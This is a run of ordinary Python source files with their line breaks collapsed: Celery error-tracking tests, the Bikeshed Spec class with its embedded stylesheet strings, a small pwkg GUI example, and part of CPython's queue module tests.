@celery.task(name="dummy_task") def dummy_task(): 1 / 0 with Hub.current.start_span() as span: dummy_task.delay() event, = events assert event["contexts"]["trace"]["trace_id"] != span.trace_id assert event["transaction"] == "dummy_task" exception, = event["exception"]["values"] assert exception["type"] == "ZeroDivisionError" def test_ignore_expected(capture_events, celery): events = capture_events() @celery.task(name="dummy_task", throws=(ZeroDivisionError,)) def dummy_task(x, y): return x / y dummy_task.delay(1, 2) dummy_task.delay(1, 0) assert not events def test_broken_prerun(init_celery, connect_signal): from celery.signals import task_prerun stack_lengths = [] def crash(*args, **kwargs): # scope should exist in prerun stack_lengths.append(len(Hub.current._stack)) 1 / 0 # Order here is important to reproduce the bug: In Celery 3, a crashing # prerun would prevent other preruns from running. connect_signal(task_prerun, crash) celery = init_celery() assert len(Hub.current._stack) == 1 @celery.task(name="dummy_task") def dummy_task(x, y): stack_lengths.append(len(Hub.current._stack)) return x / y if VERSION >= (4,): dummy_task.delay(2, 2) else: with pytest.raises(ZeroDivisionError): dummy_task.delay(2, 2) assert len(Hub.current._stack) == 1 if VERSION < (4,): assert stack_lengths == [2] else: assert stack_lengths == [2, 2] @pytest.mark.xfail( (4, 2, 0) <= VERSION, strict=True, reason="https://github.com/celery/celery/issues/4661", ) def test_retry(celery, capture_events): events = capture_events() failures = [True, True, False] runs = [] @celery.task(name="dummy_task", bind=True) def dummy_task(self): runs.append(1) try: if failures.pop(0): 1 / 0 except Exception as exc: self.retry(max_retries=2, exc=exc) dummy_task.delay() assert len(runs) == 3 assert not events failures = [True, True, True] runs = [] dummy_task.delay() assert len(runs) == 3 event, = events exceptions = event["exception"]["values"] for e in exceptions: assert e["type"] == "ZeroDivisionError" @pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken") def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir): events = capture_events_forksafe() celery.conf.worker_max_tasks_per_child = 1 celery.conf.broker_url = "memory://localhost/" celery.conf.broker_backend = "memory" celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results")) celery.conf.task_always_eager = False runs = [] @celery.task(name="dummy_task", bind=True) def dummy_task(self): runs.append(1) 1 / 0 res = dummy_task.delay() w = worker.worker(app=celery) t = threading.Thread(target=w.run) t.daemon = True t.start() with pytest.raises(Exception): # Celery 4.1 raises a gibberish exception res.wait() event = events.read_event() exception, = event["exception"]["values"] assert exception["type"] == "ZeroDivisionError" events.read_flush() # if this is nonempty, the worker never really forked assert not runs
Spec.py
import glob import json import os import sys from collections import defaultdict from datetime import datetime from functools import partial as curry from . import ( biblio, boilerplate, caniuse, conditional, config, constants, datablocks, dfns, extensions, fingerprinting, func, h, headings, highlight, idl, includes, inlineTags, InputSource, lint, markdown, mdnspeclinks, messages as m, metadata, refs, retrieve, shorthands, unsortedJunk as u, wpt, ) class Spec: def __init__( self, inputFilename, debug=False, token=None, lineNumbers=False, fileRequester=None, testing=False, ): catchArgparseBug(inputFilename) self.valid = False self.lineNumbers = lineNumbers if lineNumbers: # line-numbers are too hacky, so force this to be a dry run constants.dryRun = True if inputFilename is None: inputFilename = findImplicitInputFile() if inputFilename is None: # still m.die( "No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN." ) return self.inputSource = InputSource.InputSource(inputFilename, chroot=constants.chroot) self.transitiveDependencies = set() self.debug = debug self.token = token self.testing = testing if fileRequester is None: self.dataFile = retrieve.defaultRequester else: self.dataFile = fileRequester self.md = None self.mdBaseline = None self.mdDocument = None self.mdCommandLine = None self.mdDefaults = None self.mdOverridingDefaults = None self.lines = [] self.document = None self.html = None self.head = None self.body = None self.fillContainers = None self.valid = self.initializeState() def initializeState(self): self.normativeRefs = {} self.informativeRefs = {} self.refs = refs.ReferenceManager(fileRequester=self.dataFile, testing=self.testing) self.externalRefsUsed = defaultdict(lambda: defaultdict(dict)) self.md = None self.mdBaseline = metadata.MetadataManager() self.mdDocument = None self.mdCommandLine = metadata.MetadataManager() self.mdDefaults = None self.mdOverridingDefaults = None self.biblios = {} self.typeExpansions = {} self.macros = defaultdict(lambda x: "???") self.canIUse = {} self.mdnSpecLinks = {} self.widl = idl.getParser() self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True)) self.languages = json.loads(self.dataFile.fetch("languages.json", str=True)) self.extraStyles = defaultdict(str) self.extraStyles["style-colors"] = styleColors self.extraStyles["style-darkmode"] = styleDarkMode self.extraStyles["style-md-lists"] = styleMdLists self.extraStyles["style-autolinks"] = styleAutolinks self.extraStyles["style-selflinks"] = styleSelflinks self.extraStyles["style-counters"] = styleCounters self.extraStyles["style-issues"] = styleIssues self.extraScripts = defaultdict(str) try: inputContent = self.inputSource.read() self.lines = inputContent.lines if inputContent.date is not None: self.mdBaseline.addParsedData("Date", inputContent.date) except FileNotFoundError: m.die(f"Couldn't find the input file at the specified location '{self.inputSource}'.") return False except OSError: m.die(f"Couldn't open the input file '{self.inputSource}'.") return False return True def recordDependencies(self, *inputSources): self.transitiveDependencies.update(inputSources) def preprocess(self): self.transitiveDependencies.clear() self.assembleDocument() self.processDocument() def assembleDocument(self): # Textual hacks u.stripBOM(self) if self.lineNumbers: self.lines = u.hackyLineNumbers(self.lines) self.lines = markdown.stripComments(self.lines) self.recordDependencies(self.inputSource) # Extract and process metadata self.lines, self.mdDocument = metadata.parse(lines=self.lines) # First load the metadata sources from 'local' data self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine) # Using that to determine the Group and Status, load the correct defaults.include boilerplate self.mdDefaults = metadata.fromJson( data=retrieve.retrieveBoilerplateFile(self, "defaults", error=True), source="defaults", ) self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine) # Using all of that, load up the text macros so I can sub them into the computed-metadata file. self.md.fillTextMacros(self.macros, doc=self) jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k, v in self.macros.items()} computedMdText = h.replaceMacros( retrieve.retrieveBoilerplateFile(self, "computed-metadata", error=True), macros=jsonEscapedMacros, ) self.mdOverridingDefaults = metadata.fromJson(data=computedMdText, source="computed-metadata") self.md = metadata.join( self.mdBaseline, self.mdDefaults, self.mdOverridingDefaults, self.mdDocument, self.mdCommandLine, ) # Finally, compute the "implicit" things. self.md.computeImplicitMetadata(doc=self) # And compute macros again, in case the preceding steps changed them. self.md.fillTextMacros(self.macros, doc=self) self.md.validate() extensions.load(self) # Initialize things self.refs.initializeRefs(self) self.refs.initializeBiblio() # Deal with further <pre> blocks, and markdown self.lines = datablocks.transformDataBlocks(self, self.lines) self.lines = markdown.parse( self.lines, self.md.indent, opaqueElements=self.md.opaqueElements, blockElements=self.md.blockElements, ) self.refs.setSpecData(self.md) # Convert to a single string of html now, for convenience. self.html = "".join(line.text for line in self.lines) boilerplate.addHeaderFooter(self) self.html = self.fixText(self.html) # Build the document self.document = h.parseDocument(self.html) self.head = h.find("head", self) self.body = h.find("body", self) u.correctFrontMatter(self) includes.processInclusions(self) metadata.parseDoc(self) def processDocument(self): # Fill in and clean up a bunch of data conditional.processConditionals(self) self.fillContainers = u.locateFillContainers(self) lint.exampleIDs(self) wpt.processWptElements(self) boilerplate.addBikeshedVersion(self) boilerplate.addCanonicalURL(self) boilerplate.addFavicon(self) boilerplate.addSpecVersion(self) boilerplate.addStatusSection(self) boilerplate.addLogo(self) boilerplate.addCopyright(self) boilerplate.addSpecMetadataSection(self) boilerplate.addAbstract(self) boilerplate.addExpiryNotice(self) boilerplate.addObsoletionNotice(self) boilerplate.addAtRisk(self) u.addNoteHeaders(self) boilerplate.removeUnwantedBoilerplate(self) shorthands.run(self) inlineTags.processTags(self) u.canonicalizeShortcuts(self) u.addImplicitAlgorithms(self) u.fixManualDefTables(self) headings.processHeadings(self) u.checkVarHygiene(self) u.processIssuesAndExamples(self) idl.markupIDL(self) u.inlineRemoteIssues(self) u.addImageSize(self) # Handle all the links u.processBiblioLinks(self) u.processDfns(self) idl.processIDL(self) dfns.annotateDfns(self) u.formatArgumentdefTables(self) u.formatElementdefTables(self) u.processAutolinks(self) biblio.dedupBiblioReferences(self) u.verifyUsageOfAllLocalBiblios(self) caniuse.addCanIUsePanels(self) boilerplate.addIndexSection(self) boilerplate.addExplicitIndexes(self) boilerplate.addStyles(self) boilerplate.addReferencesSection(self) boilerplate.addPropertyIndex(self) boilerplate.addIDLSection(self) boilerplate.addIssuesSection(self) boilerplate.addCustomBoilerplate(self) headings.processHeadings(self, "all") # again boilerplate.removeUnwantedBoilerplate(self) boilerplate.addTOCSection(self) u.addSelfLinks(self) u.processAutolinks(self) boilerplate.addAnnotations(self) boilerplate.removeUnwantedBoilerplate(self) # Add MDN panels after all IDs/anchors have been added mdnspeclinks.addMdnPanels(self) highlight.addSyntaxHighlighting(self) boilerplate.addBikeshedBoilerplate(self) fingerprinting.addTrackingVector(self) u.fixIntraDocumentReferences(self) u.fixInterDocumentReferences(self) u.removeMultipleLinks(self) u.forceCrossorigin(self) lint.brokenLinks(self) lint.accidental2119(self) lint.missingExposed(self) lint.requiredIDs(self) lint.unusedInternalDfns(self) # Any final HTML cleanups u.cleanupHTML(self) if self.md.prepTR: # Don't try and override the W3C's icon. for el in h.findAll("[rel ~= 'icon']", self): h.removeNode(el) # Make sure the W3C stylesheet is after all other styles. for el in h.findAll("link", self): if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"): h.appendChild(h.find("head", self), el) # Ensure that all W3C links are https. for el in h.findAll("a", self): href = el.get("href", "") if href.startswith("http://www.w3.org") or href.startswith("http://lists.w3.org"): el.set("href", "https" + href[4:]) text = el.text or "" if text.startswith("http://www.w3.org") or text.startswith("http://lists.w3.org"): el.text = "https" + text[4:] # Loaded from .include files extensions.BSPrepTR(self) # pylint: disable=no-member return self def serialize(self): try: rendered = h.Serializer(self.md.opaqueElements, self.md.blockElements).serialize(self.document) except Exception as e: m.die(str(e)) return rendered = u.finalHackyCleanup(rendered) return rendered def fixMissingOutputFilename(self, outputFilename): if outputFilename is None: # More sensible defaults! if not isinstance(self.inputSource, InputSource.FileInputSource): outputFilename = "-" elif self.inputSource.sourceName.endswith(".bs"): outputFilename = self.inputSource.sourceName[0:-3] + ".html" elif self.inputSource.sourceName.endswith(".src.html"): outputFilename = self.inputSource.sourceName[0:-9] + ".html" else: outputFilename = "-" return outputFilename def finish(self, outputFilename=None, newline=None): catchArgparseBug(outputFilename) self.printResultMessage() outputFilename = self.fixMissingOutputFilename(outputFilename) rendered = self.serialize() if not constants.dryRun: try: if outputFilename == "-": sys.stdout.write(rendered) else: with open(outputFilename, "w", encoding="utf-8", newline=newline) as f: f.write(rendered) except Exception as e: m.die(f"Something prevented me from saving the output document to {outputFilename}:\n{e}") def printResultMessage(self): # If I reach this point, I've succeeded, but maybe with reservations. fatals = m.messageCounts["fatal"] links = m.messageCounts["linkerror"] warnings = m.messageCounts["warning"] if self.lineNumbers: m.warn("Because --line-numbers was used, no output was saved.") if fatals: m.success("Successfully generated, but fatal errors were suppressed") return if links: m.success(f"Successfully generated, with {links} linking errors") return if warnings: m.success("Successfully generated, with warnings") return def watch(self, outputFilename, port=None, localhost=False): import time outputFilename = self.fixMissingOutputFilename(outputFilename) if self.inputSource.mtime() is None: m.die(f"Watch mode doesn't support {self.inputSource}") if outputFilename == "-": m.die("Watch mode doesn't support streaming to STDOUT.") return if port: # Serve the folder on an HTTP server import http.server import socketserver import threading class SilentServer(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): pass socketserver.TCPServer.allow_reuse_address = True server = socketserver.TCPServer(("localhost" if localhost else "", port), SilentServer) print(f"Serving at port {port}") thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() else: server = None mdCommandLine = self.mdCommandLine try: self.preprocess() self.finish(outputFilename) lastInputModified = {dep: dep.mtime() for dep in self.transitiveDependencies} printDone() try: while True: # Comparing mtimes with "!=" handles when a file starts or # stops existing, and it's fine to rebuild if an mtime # somehow gets older. if any(input.mtime() != lastModified for input, lastModified in lastInputModified.items()): m.resetSeenMessages() m.p("\nSource file modified. Rebuilding...") self.initializeState() self.mdCommandLine = mdCommandLine self.preprocess() self.finish(outputFilename) lastInputModified = {dep: dep.mtime() for dep in self.transitiveDependencies} printDone() time.sleep(1) except KeyboardInterrupt: m.p("Exiting~") if server: server.shutdown() thread.join() sys.exit(0) except Exception as e: m.die(f"Something went wrong while watching the file:\n{e}") def fixText(self, text, moreMacros=None): # Do several textual replacements that need to happen *before* the document is parsed as h. # If markdown shorthands are on, remove all `foo`s while processing, # so their contents don't accidentally trigger other stuff. # Also handle markdown escapes. if moreMacros is None: moreMacros = {} if "markdown" in self.md.markupShorthands: textFunctor = u.MarkdownCodeSpans(text) else: textFunctor = func.Functor(text) macros = dict(self.macros, **moreMacros) textFunctor = textFunctor.map(curry(h.replaceMacros, macros=macros)) textFunctor = textFunctor.map(h.fixTypography) if "css" in self.md.markupShorthands: textFunctor = textFunctor.map(h.replaceAwkwardCSSShorthands) return textFunctor.extract() def printTargets(self): m.p("Exported terms:") for el in h.findAll("[data-export]", self): for term in config.linkTextsFromElement(el): m.p(" " + term) m.p("Unexported terms:") for el in h.findAll("[data-noexport]", self): for term in config.linkTextsFromElement(el): m.p(" " + term) def isOpaqueElement(self, el): if el.tag in self.md.opaqueElements: return True if el.get("data-opaque") is not None: return True return False def printDone(): contents = f"Finished at {datetime.now().strftime('%H:%M:%S %b-%d-%Y')}" contentLen = len(contents) + 2 if not constants.asciiOnly: m.p(f"╭{'─'*contentLen}╮") m.p(f"│ {contents} │") m.p(f"╰{'─'*contentLen}╯") m.p("") else: m.p(f"/{'-'*contentLen}\\") m.p(f"| {contents} |") m.p(f"\\{'-'*contentLen}/") m.p("") def findImplicitInputFile(): """ Find what input file the user *probably* wants to use, by scanning the current folder. In preference order: 1. index.bs 2. Overview.bs 3. the first file with a .bs extension 4. the first file with a .src.html extension """ if os.path.isfile("index.bs"): return "index.bs" if os.path.isfile("Overview.bs"): return "Overview.bs" allBs = glob.glob("*.bs") if allBs: return allBs[0] allHtml = glob.glob("*.src.html") if allHtml: return allHtml[0] return None def catchArgparseBug(string): # Argparse has had a long-standing bug # https://bugs.python.org/issue22433 # about spaces in the values of unknown optional arguments # (even when the space is in a quoted string!). # I can't fix this without doing a lot of work myself, # but I *can* discover when it has been tripped, # as the input or output filename will look like # a command-line flag, very unlikely on its own. if isinstance(string, str) and string.startswith("--") and "=" in string: m.die( "You're hitting a bug with Python's argparse library. Please specify both the input and output filenames manually, and move all command-line flags with spaces in their values to after those arguments.\nSee <https://tabatkins.github.io/bikeshed/#md-issues> for details." ) return False return True styleColors = """ /* Any --*-text not paired with a --*-bg is assumed to have a transparent bg */ :root { color-scheme: light dark; --text: black; --bg: white; --unofficial-watermark: url(https://www.w3.org/StyleSheets/TR/2016/logos/UD-watermark); --logo-bg: #1a5e9a; --logo-active-bg: #c00; --logo-text: white; --tocnav-normal-text: #707070; --tocnav-normal-bg: var(--bg); --tocnav-hover-text: var(--tocnav-normal-text); --tocnav-hover-bg: #f8f8f8; --tocnav-active-text: #c00; --tocnav-active-bg: var(--tocnav-normal-bg); --tocsidebar-text: var(--text); --tocsidebar-bg: #f7f8f9; --tocsidebar-shadow: rgba(0,0,0,.1); --tocsidebar-heading-text: hsla(203,20%,40%,.7); --toclink-text: var(--text); --toclink-underline: #3980b5; --toclink-visited-text: var(--toclink-text); --toclink-visited-underline: #054572; --heading-text: #005a9c; --hr-text: var(--text); --algo-border: #def; --del-text: red; --del-bg: transparent; --ins-text: #080; --ins-bg: transparent; --a-normal-text: #034575; --a-normal-underline: #bbb; --a-visited-text: var(--a-normal-text); --a-visited-underline: #707070; --a-hover-bg: rgba(75%, 75%, 75%, .25); --a-active-text: #c00; --a-active-underline: #c00; --blockquote-border: silver; --blockquote-bg: transparent; --blockquote-text: currentcolor; --issue-border: #e05252; --issue-bg: #fbe9e9; --issue-text: var(--text); --issueheading-text: #831616; --example-border: #e0cb52; --example-bg: #fcfaee; --example-text: var(--text); --exampleheading-text: #574b0f; --note-border: #52e052; --note-bg: #e9fbe9; --note-text: var(--text); --noteheading-text: hsl(120, 70%, 30%); --notesummary-underline: silver; --assertion-border: #aaa; --assertion-bg: #eee; --assertion-text: black; --advisement-border: orange; --advisement-bg: #fec; --advisement-text: var(--text); --advisementheading-text: #b35f00; --warning-border: red; --warning-bg: hsla(40,100%,50%,0.95); --warning-text: var(--text); --amendment-border: #330099; --amendment-bg: #F5F0FF; --amendment-text: var(--text); --amendmentheading-text: #220066; --def-border: #8ccbf2; --def-bg: #def; --def-text: var(--text); --defrow-border: #bbd7e9; --datacell-border: silver; --indexinfo-text: #707070; --indextable-hover-text: black; --indextable-hover-bg: #f7f8f9; --outdatedspec-bg: rgba(0, 0, 0, .5); --outdatedspec-text: black; --outdated-bg: maroon; --outdated-text: white; --outdated-shadow: red; --editedrec-bg: darkorange; }""" styleDarkMode = """ @media (prefers-color-scheme: dark) { :root { --text: #ddd; --bg: black; --unofficial-watermark: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='400' height='400'%3E%3Cg fill='%23100808' transform='translate(200 200) rotate(-45) translate(-200 -200)' stroke='%23100808' stroke-width='3'%3E%3Ctext x='50%25' y='220' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EUNOFFICIAL%3C/text%3E%3Ctext x='50%25' y='305' style='font: bold 70px sans-serif; text-anchor: middle; letter-spacing: 6px;'%3EDRAFT%3C/text%3E%3C/g%3E%3C/svg%3E"); --logo-bg: #1a5e9a; --logo-active-bg: #c00; --logo-text: white; --tocnav-normal-text: #999; --tocnav-normal-bg: var(--bg); --tocnav-hover-text: var(--tocnav-normal-text); --tocnav-hover-bg: #080808; --tocnav-active-text: #f44; --tocnav-active-bg: var(--tocnav-normal-bg); --tocsidebar-text: var(--text); --tocsidebar-bg: #080808; --tocsidebar-shadow: rgba(255,255,255,.1); --tocsidebar-heading-text: hsla(203,20%,40%,.7); --toclink-text: var(--text); --toclink-underline: #6af; --toclink-visited-text: var(--toclink-text); --toclink-visited-underline: #054572; --heading-text: #8af; --hr-text: var(--text); --algo-border: #456; --del-text: #f44; --del-bg: transparent; --ins-text: #4a4; --ins-bg: transparent; --a-normal-text: #6af; --a-normal-underline: #555; --a-visited-text: var(--a-normal-text); --a-visited-underline: var(--a-normal-underline); --a-hover-bg: rgba(25%, 25%, 25%, .2); --a-active-text: #f44; --a-active-underline: var(--a-active-text); --borderedblock-bg: rgba(255, 255, 255, .05); --blockquote-border: silver; --blockquote-bg: var(--borderedblock-bg); --blockquote-text: currentcolor; --issue-border: #e05252; --issue-bg: var(--borderedblock-bg); --issue-text: var(--text); --issueheading-text: hsl(0deg, 70%, 70%); --example-border: hsl(50deg, 90%, 60%); --example-bg: var(--borderedblock-bg); --example-text: var(--text); --exampleheading-text: hsl(50deg, 70%, 70%); --note-border: hsl(120deg, 100%, 35%); --note-bg: var(--borderedblock-bg); --note-text: var(--text); --noteheading-text: hsl(120, 70%, 70%); --notesummary-underline: silver; --assertion-border: #444; --assertion-bg: var(--borderedblock-bg); --assertion-text: var(--text); --advisement-border: orange; --advisement-bg: #222218; --advisement-text: var(--text); --advisementheading-text: #f84; --warning-border: red; --warning-bg: hsla(40,100%,20%,0.95); --warning-text: var(--text); --amendment-border: #330099; --amendment-bg: #080010; --amendment-text: var(--text); --amendmentheading-text: #cc00ff; --def-border: #8ccbf2; --def-bg: #080818; --def-text: var(--text); --defrow-border: #136; --datacell-border: silver; --indexinfo-text: #aaa; --indextable-hover-text: var(--text); --indextable-hover-bg: #181818; --outdatedspec-bg: rgba(255, 255, 255, .5); --outdatedspec-text: black; --outdated-bg: maroon; --outdated-text: white; --outdated-shadow: red; --editedrec-bg: darkorange; } /* In case a transparent-bg image doesn't expect to be on a dark bg, which is quite common in practice... */ img { background: white; } }""" styleMdLists = """ /* This is a weird hack for me not yet following the commonmark spec regarding paragraph and lists. */ [data-md] > :first-child { margin-top: 0; } [data-md] > :last-child { margin-bottom: 0; }""" styleAutolinks = """ .css.css, .property.property, .descriptor.descriptor { color: var(--a-normal-text); font-size: inherit; font-family: inherit; } .css::before, .property::before, .descriptor::before { content: "‘"; } .css::after, .property::after, .descriptor::after { content: "’"; } .property, .descriptor { /* Don't wrap property and descriptor names */ white-space: nowrap; } .type { /* CSS value <type> */ font-style: italic; } pre .property::before, pre .property::after { content: ""; } [data-link-type="property"]::before, [data-link-type="propdesc"]::before, [data-link-type="descriptor"]::before, [data-link-type="value"]::before, [data-link-type="function"]::before, [data-link-type="at-rule"]::before, [data-link-type="selector"]::before, [data-link-type="maybe"]::before { content: "‘"; } [data-link-type="property"]::after, [data-link-type="propdesc"]::after, [data-link-type="descriptor"]::after, [data-link-type="value"]::after, [data-link-type="function"]::after, [data-link-type="at-rule"]::after, [data-link-type="selector"]::after, [data-link-type="maybe"]::after { content: "’"; } [data-link-type].production::before, [data-link-type].production::after, .prod [data-link-type]::before, .prod [data-link-type]::after { content: ""; } [data-link-type=element], [data-link-type=element-attr] { font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace; font-size: .9em; } [data-link-type=element]::before { content: "<" } [data-link-type=element]::after { content: ">" } [data-link-type=biblio] { white-space: pre; }""" styleSelflinks = """ :root { --selflink-text: white; --selflink-bg: gray; --selflink-hover-text: black; } .heading, .issue, .note, .example, li, dt { position: relative; } a.self-link { position: absolute; top: 0; left: calc(-1 * (3.5rem - 26px)); width: calc(3.5rem - 26px); height: 2em; text-align: center; border: none; transition: opacity .2s; opacity: .5; } a.self-link:hover { opacity: 1; } .heading > a.self-link { font-size: 83%; } li > a.self-link { left: calc(-1 * (3.5rem - 26px) - 2em); } dfn > a.self-link { top: auto; left: auto; opacity: 0; width: 1.5em; height: 1.5em; background: var(--selflink-bg); color: var(--selflink-text); font-style: normal; transition: opacity .2s, background-color .2s, color .2s; } dfn:hover > a.self-link { opacity: 1; } dfn > a.self-link:hover { color: var(--selflink-hover-text); } a.self-link::before { content: "¶"; } .heading > a.self-link::before { content: "§"; } dfn > a.self-link::before { content: "#"; } """ styleDarkMode += """ @media (prefers-color-scheme: dark) { :root { --selflink-text: black; --selflink-bg: silver; --selflink-hover-text: white; } } """ styleCounters = """ body { counter-reset: example figure issue; } .issue { counter-increment: issue; } .issue:not(.no-marker)::before { content: "Issue " counter(issue); } .example { counter-increment: example; } .example:not(.no-marker)::before { content: "Example " counter(example); } .invalid.example:not(.no-marker)::before, .illegal.example:not(.no-marker)::before { content: "Invalid Example" counter(example); } figcaption { counter-increment: figure; } figcaption:not(.no-marker)::before { content: "Figure " counter(figure) " "; }""" styleIssues = """ a[href].issue-return { float: right; float: inline-end; color: var(--issueheading-text); font-weight: bold; text-decoration: none; } """
example.py
#!/usr/bin/env python import sys, time sys.path.append('..') import pwkg def setupElectron(index_path, on_event): w = pwkg.Window(100, 100, "PWKG Window", debug=True) w.load(index_path) w.on_gui_event += on_event return w def sleep(x): time.sleep(x) def on_js_event(msg): print(msg) print(msg['testdict']) #TODO: this blocks main thread def on_update(w): #from multiprocessing import Process #p = Process(target=lambda:adblib.screenshot(pic_path)) #p.start() print("yo") line = "hi" #sys.stdin.readline() print(line) w.exec_js('console.log("hi")'); def main(): w = setupElectron('index.html', on_js_event) w.run(on_update, 1000) main()
test_queue.py
# Some simple queue module tests, plus some failure conditions # to ensure the Queue locks remain stable. import itertools import random import threading import time import unittest import weakref from test import support py_queue = support.import_fresh_module('queue', blocked=['_queue']) c_queue = support.import_fresh_module('queue', fresh=['_queue']) need_c_queue = unittest.skipUnless(c_queue, "No _queue module found") QUEUE_SIZE = 5 def qfull(q): return q.maxsize > 0 and q.qsize() == q.maxsize # A thread to run a function that unclogs a blocked Queue. class _TriggerThread(threading.Thread): def __init__(self, fn, args): self.fn = fn self.args = args self.startedEvent = threading.Event() threading.Thread.__init__(self) def run(self): # The sleep isn't necessary, but is intended to give the blocking # function in the main thread a chance at actually blocking before # we unclog it. But if the sleep is longer than the timeout-based # tests wait in their blocking functions, those tests will fail. # So we give them much longer timeout values compared to the # sleep here (I aimed at 10 seconds for blocking functions -- # they should never actually wait that long - they should make # progress as soon as we call self.fn()). time.sleep(0.1) self.startedEvent.set() self.fn(*self.args) # Execute a function that blocks, and in a separate thread, a function that # triggers the release. Returns the result of the blocking function. Caution: # block_func must guarantee to block until trigger_func is called, and # trigger_func must guarantee to change queue state so that block_func can make # enough progress to return. In particular, a block_func that just raises an # exception regardless of whether trigger_func is called will lead to # timing-dependent sporadic failures, and one of those went rarely seen but # undiagnosed for years. Now block_func must be unexceptional. If block_func # is supposed to raise an exception, call do_exceptional_blocking_test() # instead. class BlockingTestMixin: def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args): thread = _TriggerThread(trigger_func, trigger_args) thread.start() try: self.result = block_func(*block_args) # If block_func returned before our thread made the call, we failed! if not thread.startedEvent.is_set(): self.fail("blocking function %r appeared not to block" % block_func) return self.result finally: support.join_thread(thread, 10) # make sure the thread terminates # Call this instead if block_func is supposed to raise an exception. def do_exceptional_blocking_test(self,block_func, block_args, trigger_func, trigger_args, expected_exception_class): thread = _TriggerThread(trigger_func, trigger_args) thread.start() try: try: block_func(*block_args) except expected_exception_class: raise else: self.fail("expected exception of kind %r" % expected_exception_class) finally: support.join_thread(thread, 10) # make sure the thread terminates if not thread.startedEvent.is_set(): self.fail("trigger thread ended but event never set") class BaseQueueTestMixin(BlockingTestMixin): def setUp(self): self.cum = 0 self.cumlock = threading.Lock() def basic_queue_test(self, q): if q.qsize(): raise RuntimeError("Call this function with an empty queue") self.assertTrue(q.empty()) self.assertFalse(q.full()) # I guess we better check things actually queue correctly a little :) q.put(111) q.put(333) q.put(222) target_order = dict(Queue = [111, 333, 222], LifoQueue = [222, 333, 111], PriorityQueue = [111, 222, 333]) actual_order = [q.get(), q.get(), q.get()] self.assertEqual(actual_order, target_order[q.__class__.__name__], "Didn't seem to queue the correct data!") for i in range(QUEUE_SIZE-1): q.put(i) self.assertTrue(q.qsize(), "Queue should not be empty") self.assertTrue(not qfull(q), "Queue should not be full") last = 2 * QUEUE_SIZE full = 3 * 2 * QUEUE_SIZE q.put(last) self.assertTrue(qfull(q), "Queue should be full") self.assertFalse(q.empty()) self.assertTrue(q.full()) try: q.put(full, block=0) self.fail("Didn't appear to block with a full queue") except self.queue.Full: pass try: q.put(full, timeout=0.01) self.fail("Didn't appear to time-out with a full queue") except self.queue.Full: pass # Test a blocking put self.do_blocking_test(q.put, (full,), q.get, ()) self.do_blocking_test(q.put, (full, True, 10), q.get, ()) # Empty it for i in range(QUEUE_SIZE): q.get() self.assertTrue(not q.qsize(), "Queue should be empty") try: q.get(block=0) self.fail("Didn't appear to block with an empty queue") except self.queue.Empty: pass try: q.get(timeout=0.01) self.fail("Didn't appear to time-out with an empty queue") except self.queue.Empty: pass # Test a blocking get self.do_blocking_test(q.get, (), q.put, ('empty',)) self.do_blocking_test(q.get, (True, 10), q.put, ('empty',)) def worker(self, q): while True: x = q.get() if x < 0: q.task_done() return with self.cumlock: self.cum += x q.task_done() def queue_join_test(self, q): self.cum = 0 threads = [] for i in (0,1): thread = threading.Thread(target=self.worker, args=(q,)) thread.start() threads.append(thread) for i in range(100): q.put(i) q.join() self.assertEqual(self.cum, sum(range(100)), "q.join() did not block until all tasks were done") for i in (0,1): q.put(-1) # instruct the threads to close q.join() # verify that you can join twice for thread in threads: thread.join() def test_queue_task_done(self): # Test to make sure a queue task completed successfully. q = self.type2test() try: q.task_done() except ValueError: pass else: self.fail("Did not detect task count going negative") def test_queue_join(self): # Test that a queue join()s successfully, and before anything else # (done twice for insurance). q = self.type2test() self.queue_join_test(q) self.queue_join_test(q) try: q.task_done() except ValueError: pass else: self.fail("Did not detect task count going negative") def test_basic(self): # Do it a couple of times on the same queue. # Done twice to make sure works with same instance reused. q = self.type2test(QUEUE_SIZE) self.basic_queue_test(q) self.basic_queue_test(q) def test_negative_timeout_raises_exception(self): q = self.type2test(QUEUE_SIZE) with self.assertRaises(ValueError): q.put(1, timeout=-1) with self.assertRaises(ValueError): q.get(1, timeout=-1) def test_nowait(self): q = self.type2test(QUEUE_SIZE) for i in range(QUEUE_SIZE): q.put_nowait(1) with self.assertRaises(self.queue.Full): q.put_nowait(1) for i in range(QUEUE_SIZE): q.get_nowait() with self.assertRaises(self.queue.Empty): q.get_nowait() def test_shrinking_queue(self): # issue 10110 q = self.type2test(3) q.put(1) q.put(2) q.put(3) with self.assertRaises(self.queue.Full): q.put_nowait(4) self.assertEqual(q.qsize(), 3) q.maxsize = 2 # shrink the queue with self.assertRaises(self.queue.Full): q.put_nowait(4) class QueueTest(BaseQueueTestMixin): def setUp(self): self.type2test = self.queue.Queue super().setUp() class PyQueueTest(QueueTest, unittest.TestCase): queue = py_queue @need_c_queue class CQueueTest(QueueTest, unittest.TestCase): queue = c_queue class LifoQueueTest(BaseQueueTestMixin): def setUp(self): self.type2test = self.queue.LifoQueue super().setUp() class PyLifoQueueTest(LifoQueueTest, unittest.TestCase): queue = py_queue @need_c_queue class CLifoQueueTest(LifoQueueTest, unittest.TestCase): queue = c_queue class PriorityQueueTest(BaseQueueTestMixin): def setUp(self): self.type2test = self.queue.PriorityQueue super().setUp() class PyPriorityQueueTest(PriorityQueueTest, unittest.TestCase): queue = py_queue @need_c_queue class CPriorityQueueTest(PriorityQueueTest, unittest.TestCase): queue = c_queue # A Queue subclass that can provoke failure at a moment's notice :) class FailingQueueException(Exception): pass class FailingQueueTest(BlockingTestMixin): def setUp(self): Queue = self.queue.Queue class FailingQueue(Queue): def __init__(self, *args): self.fail_next_put = False self.fail_next_get = False Queue.__init__(self, *args) def _put(self, item): if self.fail_next_put: self.fail_next_put = False raise 